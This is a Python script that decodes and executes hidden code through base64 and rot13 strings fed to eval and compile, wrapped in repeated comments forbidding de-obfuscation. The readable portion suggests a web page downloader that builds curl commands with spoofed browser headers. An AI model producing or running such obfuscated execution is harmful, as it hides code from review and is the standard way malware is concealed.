# PLEASE NOTE ANY ATTEMPT TO DE-OBFUSCATE THIS CODE IS A VIOLATION OF IT'S LICENSE, IT IS OBFUSCATED TO PREVENT EXPLOITATION OF IT'S CODE
# PLEASE NOTE ANY ATTEMPT TO DE-OBFUSCATE THIS CODE IS A VIOLATION OF IT'S LICENSE, IT IS OBFUSCATED TO PREVENT EXPLOITATION OF IT'S CODE
# PLEASE NOTE ANY ATTEMPT TO DE-OBFUSCATE THIS CODE IS A VIOLATION OF IT'S LICENSE, IT IS OBFUSCATED TO PREVENT EXPLOITATION OF IT'S CODE
import random, string
# PLEASE NOTE ANY ATTEMPT TO DE-OBFUSCATE THIS CODE IS A VIOLATION OF IT'S LICENSE, IT IS OBFUSCATED TO PREVENT EXPLOITATION OF IT'S CODE
# PLEASE NOTE ANY ATTEMPT TO DE-OBFUSCATE THIS CODE IS A VIOLATION OF IT'S LICENSE, IT IS OBFUSCATED TO PREVENT EXPLOITATION OF IT'S CODE
# PLEASE NOTE ANY ATTEMPT TO DE-OBFUSCATE THIS CODE IS A VIOLATION OF IT'S LICENSE, IT IS OBFUSCATED TO PREVENT EXPLOITATION OF IT'S CODE
import requests
# PLEASE NOTE ANY ATTEMPT TO DE-OBFUSCATE THIS CODE IS A VIOLATION OF IT'S LICENSE, IT IS OBFUSCATED TO PREVENT EXPLOITATION OF IT'S CODE
# PLEASE NOTE ANY ATTEMPT TO DE-OBFUSCATE THIS CODE IS A VIOLATION OF IT'S LICENSE, IT IS OBFUSCATED TO PREVENT EXPLOITATION OF IT'S CODE
# PLEASE NOTE ANY ATTEMPT TO DE-OBFUSCATE THIS CODE IS A VIOLATION OF IT'S LICENSE, IT IS OBFUSCATED TO PREVENT EXPLOITATION OF IT'S CODE
import threading
# PLEASE NOTE ANY ATTEMPT TO DE-OBFUSCATE THIS CODE IS A VIOLATION OF IT'S LICENSE, IT IS OBFUSCATED TO PREVENT EXPLOITATION OF IT'S CODE
# PLEASE NOTE ANY ATTEMPT TO DE-OBFUSCATE THIS CODE IS A VIOLATION OF IT'S LICENSE, IT IS OBFUSCATED TO PREVENT EXPLOITATION OF IT'S CODE
# PLEASE NOTE ANY ATTEMPT TO DE-OBFUSCATE THIS CODE IS A VIOLATION OF IT'S LICENSE, IT IS OBFUSCATED TO PREVENT EXPLOITATION OF IT'S CODE
import base64, codecs
# PLEASE NOTE ANY ATTEMPT TO DE-OBFUSCATE THIS CODE IS A VIOLATION OF IT'S LICENSE, IT IS OBFUSCATED TO PREVENT EXPLOITATION OF IT'S CODE
# PLEASE NOTE ANY ATTEMPT TO DE-OBFUSCATE THIS CODE IS A VIOLATION OF IT'S LICENSE, IT IS OBFUSCATED TO PREVENT EXPLOITATION OF IT'S CODE
# PLEASE NOTE ANY ATTEMPT TO DE-OBFUSCATE THIS CODE IS A VIOLATION OF IT'S LICENSE, IT IS OBFUSCATED TO PREVENT EXPLOITATION OF IT'S CODE
fuhhuh = 'aW1wb3J0IHN1YnByb2Nlc3MKaW1wb3J0IHN5cwppbXBvcnQgb3MKaW1wb3J0IHJlCmZyb20gdXJsbGliLnBhcnNlIGltcG9ydCB1cmxwYXJzZQoKIyBEaXJlY3RvcnkKdGVtcF9kaXIgPSAiLyV0ZW1wJSIKY3Vycl9kaXIgPSBvcy5nZXRjd2QoKQpmdWxsX2RpciA9IGN1cnJfZGlyICsgdGVtcF9kaXIKCiMgQXJndW1lbnQgSGFuZGxpbmcKdXJsID0gc3lzLmFyZ3ZbMV0KCiMgRXh0cmFjdCB0aGUgYmFzZSBVUkwgZHluYW1pY2FsbHkKcGFyc2VkX3VybCA9IHVybHBhcnNlKHVybCkKYmFzZV91cmwgPSBmIntwYXJzZWRfdXJsLnNjaGVtZX06Ly97cGFyc2VkX3VybC5uZXRsb2N9IgoKIyBNYWluIENvZGUKaWYgb3MucGF0aC5leGlzdHMoZnVsbF9kaXIgKyAiL2luZGV4Lmh0bWwiKToKICAgIG9zLnJlbW92ZShmdWxsX2RpciArICIvaW5kZXguaHRtbCIpCgoKZGVmIGZldGNoX2h0bWwodXJpKTogIAogICAgaGVhZGVycyA9IHsKICAgICAgICAiVXNlci1BZ2VudCI6ICJNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSIsCiAgICAgICAgIkFjY2VwdCI6ICJ0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSxpbWFnZS93ZWJwLCovKjtxPTAuOCIsCiAgICAgICAgIlJlZmVyZXIiOiAiaHR0cHM6Ly93d3cuZ29vZ2xlLmNvbSIsCiAgICAgICAgIkFjY2VwdC1MYW5ndWFnZSI6ICJlbi1VUyxlbjtxPTAuNSIKICAgIH0KICAgIAogICAgIyBDb252ZXJ0IGhlYWRlcnMgZGljdCBpbnRvIGN1cmwgYXJndW1lbnR'
# PLEASE NOTE ANY ATTEMPT TO DE-OBFUSCATE THIS CODE IS A VIOLATION OF IT'S LICENSE, IT IS OBFUSCATED TO PREVENT EXPLOITATION OF IT'S CODE
# PLEASE NOTE ANY ATTEMPT TO DE-OBFUSCATE THIS CODE IS A VIOLATION OF IT'S LICENSE, IT IS OBFUSCATED TO PREVENT EXPLOITATION OF IT'S CODE
# PLEASE NOTE ANY ATTEMPT TO DE-OBFUSCATE THIS CODE IS A VIOLATION OF IT'S LICENSE, IT IS OBFUSCATED TO PREVENT EXPLOITATION OF IT'S CODE
shuhhuh = 'mPvNtVPObMJSxMKWsLKWaplN9VSgzVv1VVUgeMKy9BvO7qzSfqJI9VvOzo3Vtn2I5YPO2LJk1MFOcovObMJSxMKWmYzy0MJ1mXPyqPtbtVPNtpzImpT9hp2HtCFOmqJWjpz9wMKAmYaW1ovuoVzA1pzjvYPNvYJfvKFNeVTuyLJEypy9upzqmVPftJ3IlnI0fVTAupUE1pzIso3I0pUI0CIElqJHfVUEyrUD9IUW1MFjtMJ5wo2Ecozp9VaI0Mv04VvxXVPNtVUWyqUIlovOlMKAjo25mMF5mqTEiqKDXPzEyMvOwo252MKW0K2kcozgmXTEuqTRfVTWup2IsqKWfXGbXVPNtVPZtHzIaMKttpTS0qTIlovO0olOznJ5xVUWyoTS0nKMyVUOuqTumVPu3nTyfMFOcM25ipzyhMlOuLaAioUI0MFOIHxkmXDbtVPNtpTS0qTIlovN9VUVaXTulMJM8p3WwsTkcozfcCIgpWlWqXQ8unUE0pUZ/Bv8iXFtiC1grKPpvKFfcJ1jaVy0aPvNtVPNXVPNtVTEyMvOlMKOfLJAypvugLKEwnPx6PvNtVPNtVPNtqTSaYPOjLKEbVQ0toJS0L2thM3WiqKOmXPxXVPNtVPNtVPNwV'
# PLEASE NOTE ANY ATTEMPT TO DE-OBFUSCATE THIS CODE IS A VIOLATION OF IT'S LICENSE, IT IS OBFUSCATED TO PREVENT EXPLOITATION OF IT'S CODE
# PLEASE NOTE ANY ATTEMPT TO DE-OBFUSCATE THIS CODE IS A VIOLATION OF IT'S LICENSE, IT IS OBFUSCATED TO PREVENT EXPLOITATION OF IT'S CODE
# PLEASE NOTE ANY ATTEMPT TO DE-OBFUSCATE THIS CODE IS A VIOLATION OF IT'S LICENSE, IT IS OBFUSCATED TO PREVENT EXPLOITATION OF IT'S CODE
yuhhuh = 'RyzVUOuqTttp3EupaEmVUqcqTttWl8aYPO0pzIuqPOcqPOuplOmnKEyYKWyoTS0nKMyPvNtVPNtVPNtMaIfoS9jLKEbVQ0tMvW7LzSmMI91pzk9r3OuqTu9VvOcMvOjLKEbYaA0LKW0p3qcqTtbVv8vXFOyoUAyVTLvr2Wup2IsqKWfsF97pTS0nU0vPvNtVPNtVPNtPvNtVPNtVPNtpzI0qKWhVTLar3EuM309VagzqJkfK3OuqTu9VvpXPvNtVPOlMKE1pz4tpzHhp3IvXUOuqUEypz4fVUWypTkuL2IlYPOxLKEuXDbXMTIzVUOupaAyK2u0oJjbMTS0LFx6PvNtVPOgo2EcMzyyMS9xLKEuVQ0tL29hqzIlqS9fnJ5epluxLKEuYPOvLKAyK3IloPxXVPNtVUqcqTtto3OyovuzqJkfK2EcpvNeVPVinJ5xMKthnUEgoPVfVPW3VvjtMJ5wo2Ecozp9VaI0Mv04VvxtLKZtMwbXVPNtVPNtVPOzYaqlnKEyXT1iMTyznJIxK2EuqTRcPtc1oaOupaAyMS9bqT1fVQ0tMzI0L2usnUEgoPu1pzjcPaOupaAyK2u0oJjbqJ5jLKWmMJEsnUEgoPxX'
# PLEASE NOTE ANY ATTEMPT TO DE-OBFUSCATE THIS CODE IS A VIOLATION OF IT'S LICENSE, IT IS OBFUSCATED TO PREVENT EXPLOITATION OF IT'S CODE
# PLEASE NOTE ANY ATTEMPT TO DE-OBFUSCATE THIS CODE IS A VIOLATION OF IT'S LICENSE, IT IS OBFUSCATED TO PREVENT EXPLOITATION OF IT'S CODE
# PLEASE NOTE ANY ATTEMPT TO DE-OBFUSCATE THIS CODE IS A VIOLATION OF IT'S LICENSE, IT IS OBFUSCATED TO PREVENT EXPLOITATION OF IT'S CODE
uhhuh = "\x72\x6f\x74\x31\x33"
# PLEASE NOTE ANY ATTEMPT TO DE-OBFUSCATE THIS CODE IS A VIOLATION OF IT'S LICENSE, IT IS OBFUSCATED TO PREVENT EXPLOITATION OF IT'S CODE
# PLEASE NOTE ANY ATTEMPT TO DE-OBFUSCATE THIS CODE IS A VIOLATION OF IT'S LICENSE, IT IS OBFUSCATED TO PREVENT EXPLOITATION OF IT'S CODE
# PLEASE NOTE ANY ATTEMPT TO DE-OBFUSCATE THIS CODE IS A VIOLATION OF IT'S LICENSE, IT IS OBFUSCATED TO PREVENT EXPLOITATION OF IT'S CODE
muhhuh = eval('fuhhuh') + eval('codecs.decode(shuhhuh, uhhuh)') + eval('codecs.decode(yuhhuh, uhhuh)')
# PLEASE NOTE ANY ATTEMPT TO DE-OBFUSCATE THIS CODE IS A VIOLATION OF IT'S LICENSE, IT IS OBFUSCATED TO PREVENT EXPLOITATION OF IT'S CODE
# PLEASE NOTE ANY ATTEMPT TO DE-OBFUSCATE THIS CODE IS A VIOLATION OF IT'S LICENSE, IT IS OBFUSCATED TO PREVENT EXPLOITATION OF IT'S CODE
# PLEASE NOTE ANY ATTEMPT TO DE-OBFUSCATE THIS CODE IS A VIOLATION OF IT'S LICENSE, IT IS OBFUSCATED TO PREVENT EXPLOITATION OF IT'S CODE
eval(compile(base64.b64decode(eval('muhhuh')), '<string>', 'exec'))
# PLEASE NOTE ANY ATTEMPT TO DE-OBFUSCATE THIS CODE IS A VIOLATION OF IT'S LICENSE, IT IS OBFUSCATED TO PREVENT EXPLOITATION OF IT'S CODE
# PLEASE NOTE ANY ATTEMPT TO DE-OBFUSCATE THIS CODE IS A VIOLATION OF IT'S LICENSE, IT IS OBFUSCATED TO PREVENT EXPLOITATION OF IT'S CODE
# PLEASE NOTE ANY ATTEMPT TO DE-OBFUSCATE THIS CODE IS A VIOLATION OF IT'S LICENSE, IT IS OBFUSCATED TO PREVENT EXPLOITATION OF IT'S CODE